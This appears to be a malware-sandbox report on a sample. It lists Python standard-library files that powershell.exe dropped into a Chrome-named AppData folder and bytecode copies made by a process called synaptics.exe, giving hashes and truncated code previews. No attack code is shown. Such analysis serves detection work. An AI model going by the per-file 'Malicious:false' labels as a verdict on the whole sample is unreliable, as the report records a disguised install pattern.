                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20237
                                                                                                                                                                                                  Entropy (8bit):4.456113748681824
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:VIGjFGnRqmpRXDeU+e6TNkedNr/vFx0BWSvs31I:VI4GnRqm2xtOBDs31I
                                                                                                                                                                                                  MD5:75CDCBE366D13B7C463830D8FAF2DBE5
                                                                                                                                                                                                  SHA1:BBAA1236B789B5D2511A938A604361E32AEA6D6F
                                                                                                                                                                                                  SHA-256:2B0C512178EAF53227CD7D336FBC5E055509048B8E1D9CE7CBB33D56B968D4BA
                                                                                                                                                                                                  SHA-512:E9B77E373F793355BA7822C39D141054B13772D4C2124E95CB8E9FFBC684D9AB2107FFDB5C9C8009E4541CD4F1169D3AEF825AB398FB73151BA60D05963EA045
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Python part of the warnings subsystem."""....import sys......__all__ = ["warn", "warn_explicit", "showwarning",.. "formatwarning", "filterwarnings", "simplefilter",.. "resetwarnings", "catch_warnings"]....def showwarning(message, category, filename, lineno, file=None, line=None):.. """Hook to write a warning to a file; replace if you like.""".. msg = WarningMessage(message, category, filename, lineno, file, line).. _showwarnmsg_impl(msg)....def formatwarning(message, category, filename, lineno, line=None):.. """Function to format a warning the standard way.""".. msg = WarningMessage(message, category, filename, lineno, None, line).. return _formatwarnmsg_impl(msg)....def _showwarnmsg_impl(msg):.. file = msg.file.. if file is None:.. file = sys.stderr.. if file is None:.. # sys.stderr is None when run with pythonw.exe:.. # warnings get lost.. return.. text = _formatwarnmsg(msg).. try:..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\wave.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18517
                                                                                                                                                                                                  Entropy (8bit):4.368436724087491
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:l9EqMa1yctYScMTScRDpMZNCLSz7aYWTRhbtsKeU0hgIidMOhK58v36W1:lHM8ycyStUILSz7aYWTRhbtss0h9631
                                                                                                                                                                                                  MD5:D55129AF4810C592A87D75480D44C73F
                                                                                                                                                                                                  SHA1:A15D2AD39D8264C6851C5445CE08FC7A03B4426C
                                                                                                                                                                                                  SHA-256:0CC87A2E89B8B3AF9470A8EF92944EDEFD4A05E1D9ADEA6F2326F9C8E0AE78FC
                                                                                                                                                                                                  SHA-512:89B648FAB150243609A06722574434B09280941DF74845CE3B4A730A1EA55313565E32B4D439BD16B41EC272505C87C025CEBEA60026682720964790658E911D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Stuff to parse WAVE files.....Usage.....Reading WAVE files:.. f = wave.open(file, 'r')..where file is either the name of a file or an open file pointer...The open file pointer must have methods read(), seek(), and close()...When the setpos() and rewind() methods are not used, the seek()..method is not necessary.....This returns an instance of a class with the following public methods:.. getnchannels() -- returns number of audio channels (1 for.. mono, 2 for stereo).. getsampwidth() -- returns sample width in bytes.. getframerate() -- returns sampling frequency.. getnframes() -- returns number of audio frames.. getcomptype() -- returns compression type ('NONE' for linear samples).. getcompname() -- returns human-readable version of.. compression type ('not compressed' linear samples).. getparams() -- returns a namedtuple consisting of all of the.. above in th

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\weakref.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22235
                                                                                                                                                                                                  Entropy (8bit):4.290222224385809
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:eJT8HzCblJPEwGmyZVPjY8c4jDyCYAym+TiH9QHORqQeIXjWi86wow0wHRegJn9d:aVEPOpRUBzSmOjJnCoWaDf3DjJnRKs
                                                                                                                                                                                                  MD5:77D4C5645BC5F43355F2490B0DB5330D
                                                                                                                                                                                                  SHA1:C1D67552A3A49361A322BFCF9E4A925DE3E7AB57
                                                                                                                                                                                                  SHA-256:666C9958ACF3D1A307170E7E6DF53BB064C63EA4995627E870552EFA088D9A9D
                                                                                                                                                                                                  SHA-512:5A4F5864BA0813736B171CF90B90F971455D53236EE0324578CBE211BFCCB30EED11334B388C5D7D6B412D6ED25694F56948E31F440B4FDFF0C1FA76CDD5D38F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Weak reference support for Python.....This module is an implementation of PEP 205:....https://www.python.org/dev/peps/pep-0205/.."""....# Naming convention: Variables named "wr" are weak reference objects;..# they are called this instead of "ref" to avoid name collisions with..# the module-global ref() function imported from _weakref.....from _weakref import (.. getweakrefcount,.. getweakrefs,.. ref,.. proxy,.. CallableProxyType,.. ProxyType,.. ReferenceType,.. _remove_dead_weakref)....from _weakrefset import WeakSet, _IterationGuard....import _collections_abc # Import after _weakref to avoid circular import...import sys..import itertools....ProxyTypes = (ProxyType, CallableProxyType)....__all__ = ["ref", "proxy", "getweakrefcount", "getweakrefs",.. "WeakKeyDictionary", "ReferenceType", "ProxyType",.. "CallableProxyType", "ProxyTypes", "WeakValueDictionary",.. "WeakSet", "WeakMethod", "finalize"]......_collections_abc.Se

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\webbrowser.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):24962
                                                                                                                                                                                                  Entropy (8bit):4.4821654414982
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Dw+gtAvw1CThtWcOGsmCZXt11GhVqbzkeZEyF:DwXyhccVCZXiDO
                                                                                                                                                                                                  MD5:C6235576ACFA074E0602F8286D6AE967
                                                                                                                                                                                                  SHA1:E7D5740885F262528495F54F1C29E991C4C878E7
                                                                                                                                                                                                  SHA-256:91DE52B10A90BC40792725B914E2184671E2E2EE0D32E3BA6B1EC027E63BDC51
                                                                                                                                                                                                  SHA-512:1446B528F4A41C4ABC1E532F408CCDA8F4530C37E711E12A80E2141BBEEF4A98A5740EF4B759AFCCFDBD18A2D9FEC7A5A08F0BD87424EB084CF8AF6508A22BE4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#! /usr/bin/env python3.."""Interfaces for launching and remotely controlling web browsers."""..# Maintained by Georg Brandl.....import os..import shlex..import shutil..import sys..import subprocess..import threading....__all__ = ["Error", "open", "open_new", "open_new_tab", "get", "register"]....class Error(Exception):.. pass...._lock = threading.RLock().._browsers = {} # Dictionary of available browser controllers.._tryorder = None # Preference order of available browsers.._os_preferred_browser = None # The preferred browser....def register(name, klass, instance=None, *, preferred=False):.. """Register a browser connector.""".. with _lock:.. if _tryorder is None:.. register_standard_browsers().. _browsers[name.lower()] = [klass, instance].... # Preferred browsers go to the front of the list... # Need to match to the default browser returned by xdg-settings, which.. # may be of the form e.g. "fir

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\xdrlib.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6154
                                                                                                                                                                                                  Entropy (8bit):4.544312365119713
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:l3vVO5EFsFUxepdMJhp1ygk+3PGo7YytCl:l3ujSg0w6GMYywl
                                                                                                                                                                                                  MD5:AB44399A4ABB9874B0F2C2D5F9FEA306
                                                                                                                                                                                                  SHA1:0E1F67F497D7E3A497A6EBD8ED6DBAEE11A83656
                                                                                                                                                                                                  SHA-256:A9043DAD797D72C31A4A01AD4069D83AC894720EF8E72490831676A8517D0853
                                                                                                                                                                                                  SHA-512:1B905F86AF613D9AF99E2046AA82EB2C1271C7E2384DF010DBCFEC37736C2CC2592956CEB08DF567FA3CDA12B8135C55E75081727EA258921E4F8FCA6AC6C6EB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Implements (a subset of) Sun XDR -- eXternal Data Representation.....See: RFC 1014...."""....import struct..from io import BytesIO..from functools import wraps....__all__ = ["Error", "Packer", "Unpacker", "ConversionError"]....# exceptions..class Error(Exception):.. """Exception class for this module. Use:.... except xdrlib.Error as var:.. # var has the Error instance for the exception.... Public ivars:.. msg -- contains the message.... """.. def __init__(self, msg):.. self.msg = msg.. def __repr__(self):.. return repr(self.msg).. def __str__(self):.. return str(self.msg)......class ConversionError(Error):.. pass....def raise_conversion_error(function):.. """ Wrap any raised struct.errors in a ConversionError. """.... @wraps(function).. def result(self, value):.. try:.. return function(self, value).. except struct.error as e:.. raise ConversionError(e.args[0]) from None.. retur

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\zipapp.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Nim source code, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7741
                                                                                                                                                                                                  Entropy (8bit):4.6850395961561775
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:ocnKpf1Jnkgp9Gw06hznakQ+czXoC/KkWb2z7rKUK4mSaY9wRnKwfRuPKJaR0:ocR6VncLoC/Kk22z7P5Z0RFfO0
                                                                                                                                                                                                  MD5:A981793A5C496164DFB5AFC8212CCABE
                                                                                                                                                                                                  SHA1:D4309C07CFE248A9725290922937F21363550AE4
                                                                                                                                                                                                  SHA-256:EF6D063E7337F6D83FBBB4CA3ADAF321B35CBB3AF736A25D2D637231346E3117
                                                                                                                                                                                                  SHA-512:010D2A3AC76A022165E4564CF9A26A3B3324E8585CCCA1C66EE173A4C6A105993FA55B93576B0C48B271C182AC9CE87BD3CE7441CD76E2B19DE0C1907147379D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import contextlib..import os..import pathlib..import shutil..import stat..import sys..import zipfile....__all__ = ['ZipAppError', 'create_archive', 'get_interpreter']......# The __main__.py used if the users specifies "-m module:fn"...# Note that this will always be written as UTF-8 (module and..# function names can be non-ASCII in Python 3)...# We add a coding cookie even though UTF-8 is the default in Python 3..# because the resulting archive may be intended to be run under Python 2...MAIN_TEMPLATE = """\..# -*- coding: utf-8 -*-..import {module}..{module}.{fn}().."""......# The Windows launcher defaults to UTF-8 when parsing shebang lines if the..# file has no BOM. So use UTF-8 on Windows...# On Unix, use the filesystem encoding...if sys.platform.startswith('win'):.. shebang_encoding = 'utf-8'..else:.. shebang_encoding = sys.getfilesystemencoding()......class ZipAppError(ValueError):.. pass......@contextlib.contextmanager..def _maybe_open(archive, mode):.. if isinstance(

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\zipfile.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):91926
                                                                                                                                                                                                  Entropy (8bit):4.530877476231924
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:A6wB2cR7Tt7+IQOU+OnDKHnCrYYs+NocBa0q8Y:A6Ud+I9U+OnDKHCrRO8Y
                                                                                                                                                                                                  MD5:5AB203B50E60C14191FC1EED8A6DC2F9
                                                                                                                                                                                                  SHA1:44C4518C0971E7858CA45F50347820177964971E
                                                                                                                                                                                                  SHA-256:2E155CDE604896D9903A4C529B89FA768E75F6E17FB7A60DB0AC2190B0B34456
                                                                                                                                                                                                  SHA-512:A7ED4066F7FA40161E34B390C62FC9AB7B4E2EC784A9AF96C7A10F32C5D01419B5134C8639EDD1858D9C4876A2752A1863DC798BD9011ED04D6E3983263C0A4A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""..Read and write ZIP files.....XXX references to utf-8 need further investigation..."""..import binascii..import importlib.util..import io..import itertools..import os..import posixpath..import shutil..import stat..import struct..import sys..import threading..import time..import contextlib..import pathlib....try:.. import zlib # We may need its compression method.. crc32 = zlib.crc32..except ImportError:.. zlib = None.. crc32 = binascii.crc32....try:.. import bz2 # We may need its compression method..except ImportError:.. bz2 = None....try:.. import lzma # We may need its compression method..except ImportError:.. lzma = None....__all__ = ["BadZipFile", "BadZipfile", "error",.. "ZIP_STORED", "ZIP_DEFLATED", "ZIP_BZIP2", "ZIP_LZMA",.. "is_zipfile", "ZipInfo", "ZipFile", "PyZipFile", "LargeZipFile",.. "Path"]....class BadZipFile(Exception):.. pass......class LargeZipFile(Exception):.. """.. Raised when writing a zipfile, th

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\zipimport.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31670
                                                                                                                                                                                                  Entropy (8bit):4.640811570675585
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:lO/4o/ka5N9a5LL5pEveF+SS6s5Ag0k6BX8BpL:lOZ/XugefS6aAg04
                                                                                                                                                                                                  MD5:C35072F99E2CD83443AC1DB234B1716D
                                                                                                                                                                                                  SHA1:68DD726663BBE88215BFC5BF122FB82B7DE83592
                                                                                                                                                                                                  SHA-256:52580EB9D1D0607A5139EA2E6EC847CFB5DA30C37F1462E5072C960287A547E2
                                                                                                                                                                                                  SHA-512:BAD94CDC61C314DDF965C07A98304ACED800FFFA3BA5E10E32650CB026F8BDCF1F2B9A064A2C319AF7DCF3C25C09018663ABD136E16256F6736E991243636B37
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""zipimport provides support for importing Python modules from Zip archives.....This module exports three objects:..- zipimporter: a class; its constructor takes a path to a Zip archive...- ZipImportError: exception raised by zipimporter objects. It's a.. subclass of ImportError, so it can be caught as ImportError, too...- _zip_directory_cache: a dict, mapping archive paths to zip directory.. info dicts, as used in zipimporter._files.....It is usually not needed to use the zipimport module explicitly; it is..used by the builtin import mechanism for sys.path items that are paths..to Zip archives..."""....#from importlib import _bootstrap_external..#from importlib import _bootstrap # for _verbose_message..import _frozen_importlib_external as _bootstrap_external..from _frozen_importlib_external import _unpack_uint16, _unpack_uint32..import _frozen_importlib as _bootstrap # for _verbose_message..import _imp # for check_hash_based_pycs..import _io # for open..import marshal # for lo

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\lib\__pycache__\_collections_abc.cpython-310.pyc (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):32957
                                                                                                                                                                                                  Entropy (8bit):5.035245593394707
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:ZpDG8l+6pg6mG5JlooICwimTmIufuBEQtJHVDOA/8AH:rfl+VVSooICwimT3ufu+AJ1DOcvH
                                                                                                                                                                                                  MD5:6763F226CDDD531E543E644ACDF5AE18
                                                                                                                                                                                                  SHA1:87F6B7361FED314C458EE2F76EA8D235E6EC3C44
                                                                                                                                                                                                  SHA-256:2F6E1B01188CE9808A23135B42DFAB56C8622DE2C90479C1F046580751F932F6
                                                                                                                                                                                                  SHA-512:5D8668EE4F09E879049A6726F88B25DBBBFBA8E990202646E9DF5102D256D0205622B10ED393BA5654B4AB3D6DC60AA5FFAB5DE9F0BD94ACAA395621BF56407D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d.........................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF.3e(....G.dAdB..dBe;..ZGG.dCdD..dDeGeC..ZHeH.3e$..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\lib\__pycache__\_sitebuiltins.cpython-310.pyc (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3579
                                                                                                                                                                                                  Entropy (8bit):5.075177194760708
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:ysOn3Ah9/uydg7ls3pl+ltJ5+XdaCjteUzCt/BHKGZEIy0EEt:ys8Afcls3plwtJEXdaIeUzMJty0EG
                                                                                                                                                                                                  MD5:D1619889A2ACC3E25C3F903E1ABB8359
                                                                                                                                                                                                  SHA1:446A2B6177A02223A01CDA68EA13D9FBD50BA44F
                                                                                                                                                                                                  SHA-256:83B0976DAB14E2B6D757D58F369D97D30B9E6C4ACFBA9D3DE80E4029A312760B
                                                                                                                                                                                                  SHA-512:679AFEB6586E157F91B03DAE6F20AF265FE7A31DBDBFF7FE341EC4C84ABFF562F54DAC96C95BA6524656EDCE2368FB3694733E63FF6F225E08CF14788B560645
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d.........................@...s@...d.Z.d.d.l.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z=.The objects used by the site module to add custom builtins.......Nc....................@...s&...e.Z.d.Z.d.d...Z.d.d...Z.d.d.d...Z.d.S.)...Quitterc....................C...s....|.|._.|.|._.d.S...N....name..eof)...selfr....r......r.....DC:\Users\user\AppData\Local\ChromeApplication\lib\_sitebuiltins.py..__init__....s........z.Quitter.__init__c....................C...s....d.|.j.|.j.f...S.).Nz.Use %s() or %s to exitr......r....r....r....r......__repr__....s......z.Quitter.__repr__Nc....................C...s&...z.t.j.......W.t.|...........Y.t.|.....r....)...sys..stdin..close..SystemExit).r......coder....r....r......__call__....s................z.Quitter.__call__r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r........s............r....c....................@...s6...e.Z.d.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._Printerzninteractive prom

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\lib\__pycache__\abc.cpython-310.pyc (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6783
                                                                                                                                                                                                  Entropy (8bit):5.121236586738526
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:5c2+dPAL6MGWUls1p2N8R6Diag2z9o2Ue4loXLk5ebUtoH:22+dPjMGxYtag2VXLk5ewc
                                                                                                                                                                                                  MD5:57B781EFC4A1ACE2B78C33C0288D2A12
                                                                                                                                                                                                  SHA1:A208364FCE3EEE11E1FF9C2B67094448E7F271B3
                                                                                                                                                                                                  SHA-256:B96599BACF0B1A1169304DC030A1980B821B15015C3DD86254824F5D10C6644D
                                                                                                                                                                                                  SHA-512:34E63025D8807B543B1B1F9501CC933BD28FC6981605057801722E455FBF75EBDAD65E7AE10F9F68E2D49B298BC26ADCDDB69BDD705A091B63CE9337CED4A798
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d6........................@...s....d.Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...W.n...e.yH......d.d.l.m.Z.m.Z...d.e._.Y.n.w.G.d.d...d.e...Z.d.d...Z.G.d.d...d.e.d...Z.d.S.).z3Abstract Base Classes (ABCs) according to PEP 3119.c....................C...s....d.|._.|.S.).a<...A decorator indicating abstract methods... Requires that the metaclass is ABCMeta or derived from it. A. class that has a metaclass derived from ABCMeta cannot be. instantiated unless all of its abstract methods are overridden.. The abstract methods can be called using any of the normal. 'super' call mechanisms. abstractmethod() may be used to declare. abstract methods for properties and descriptors... Usage:.. class C(metaclass=ABCMeta):. @abstractmethod. def my_abstract_method(self, ...):. .... T)...__isabstractmethod__).Z.funcobj..r.....:C:\Users\user\AppData\Local\ChromeApplica

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\lib\__pycache__\codecs.cpython-310.pyc (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33251
                                                                                                                                                                                                  Entropy (8bit):5.02172627428587
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:Gl/o6wZxokNQceWYXgYD7msLySGRbmOZwENNflPKPBxKa:GvUkFrOZwENNflPKPBxKa
                                                                                                                                                                                                  MD5:F280F0558E450045A45D014F4C71C5A9
                                                                                                                                                                                                  SHA1:3FFF2CECB2DAB9E84336D6338A41887228A204D0
                                                                                                                                                                                                  SHA-256:B17373339FC55EA0707C3ACBF24A2AEAB1EDE2C1CF427348A36D2866AFC25D71
                                                                                                                                                                                                  SHA-512:8132F063EDE808721BD7D85F0EF8540CA6012099C4F7F72DA42660EAD55100CF832D711C6E8B5B5850B8D62D42328D22B2D17EB700F29F9400CEF9A5B699FC77
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d........................@...sD...d.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.T.W.n...e.y"..Z...z.e.d.e.......d.Z.[.w.w.g.d...Z.d.Z.d...Z.Z.d...Z.Z.d.Z.d.Z.e.j.d.k.rAe...Z.Z.e.Z.n.e...Z.Z.e.Z.e.Z.e.Z.e.Z.e.Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z G.d.d...d...Z!G.d.d...d...Z"dCd#d$..Z#dDd%d&..Z$d'd(..Z%d)d*..Z&d+d,..Z'd-d...Z(d/d0..Z)d1d2..Z*dEd3d4..Z+dEd5d6..Z,d7d8..Z-d9d:..Z.z.e/d!..Z0e/d;..Z1e/d<..Z2e/d=..Z3e/d>..Z4e/d?..Z5W.n...e6y.......d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5Y.n.w.d.Z7e7..r.d.d.l8Z8e9d@k...r e$e.j:dAdB..e._:e$e.j;dBdA..e._;d.S.d.S.)Fz. codecs -- Python Codec Registry, API and helpers....Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........N)...*z%Failed to load the builtin codecs: %s),..register..lookup..open..EncodedFile..BOM..BOM_BE..BOM_LE..BOM32_BE..BOM32_LE..BOM64_BE..BOM64_LE..BOM_UTF8..BOM_UTF16..BOM_UTF16_LE..BOM_UTF16_BE..BOM_UTF32..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\lib\__pycache__\genericpath.cpython-310.pyc (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3939
                                                                                                                                                                                                  Entropy (8bit):5.170336374379411
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:9qsfAs4EveosntVf4/zsSQ1ow+2U/tAaDKDj51dmvuoZ:Gs49tKyow8/tjgqWoZ
                                                                                                                                                                                                  MD5:CB969C65C0920A816C725F8C5B3C9C0A
                                                                                                                                                                                                  SHA1:021185F22A723C5ADD4DC3FD4C9A83FC20877B45
                                                                                                                                                                                                  SHA-256:8F8DE00C68E0515B89039C3988B204A88AD6400BBBBBFD1E5274F3307A6BFC42
                                                                                                                                                                                                  SHA-512:8617DC310DCFA4A346632330811195D82994E1C9125DAAB171394115D2764E6631FACFC13A0E68C7617D68DEFA93136A4983EB2707703E67503728BA3CC03670
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z..Path operations common to more than one OS.Do not use directly. The OS specific modules import the appropriate.functions from this module themselves.......N)...commonprefix..exists..getatime..getctime..getmtime..getsize..isdir..isfile..samefile..sameopenfile..samestatc....................C...s*...z.t...|.....W.d.S...t.t.f.y.......Y.d.S.w.).zDTest whether a path exists. Returns False for broken symbolic linksFT)...os..stat..OSError..ValueError)...path..r.....BC:\Users\user\AppData\Local\ChromeApplication\lib\genericpath.pyr........s................r....c....................C....4...z.t...|...}.W.n...t.t.f.y.......Y.d.S.w.t...|.j...S.).z%Test whether a path is a regular fileF).r....r....r....r......S_ISREG..st_mode).r......str....r....r....r.........................r....c....................C...r....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\lib\__pycache__\io.cpython-310.pyc (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3695
                                                                                                                                                                                                  Entropy (8bit):5.391465068163799
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:2jeBVAsKEv1YlurRNZsmi/VA61vWF/3+XIQjC2Ai3QuAXuhgwGjEPOcGcMzzMfSd:2UK0iSxOmoWF2vLAy/hyIP7GcmYa7RXn
                                                                                                                                                                                                  MD5:9B8B2828F2F9AB389BCAD678AEC74389
                                                                                                                                                                                                  SHA1:7C297EC51D16FC5E6FF83FF591A1935D5167C6B2
                                                                                                                                                                                                  SHA-256:B8348B9CFB59D3AD22F434324D67D2B49B3AC2FD59D3FFC36C918F1DFB8D4D25
                                                                                                                                                                                                  SHA-512:4392333662C0F618659E8393C4820F1006855BE2F2F397694E380B4655AB32820A8508F6CBD452F7A13BE2AC540CC03DC5BA707181A3DE9FA5FF8C1EBBA06EBE
                                                                                                                                                                                                  Malicious:false
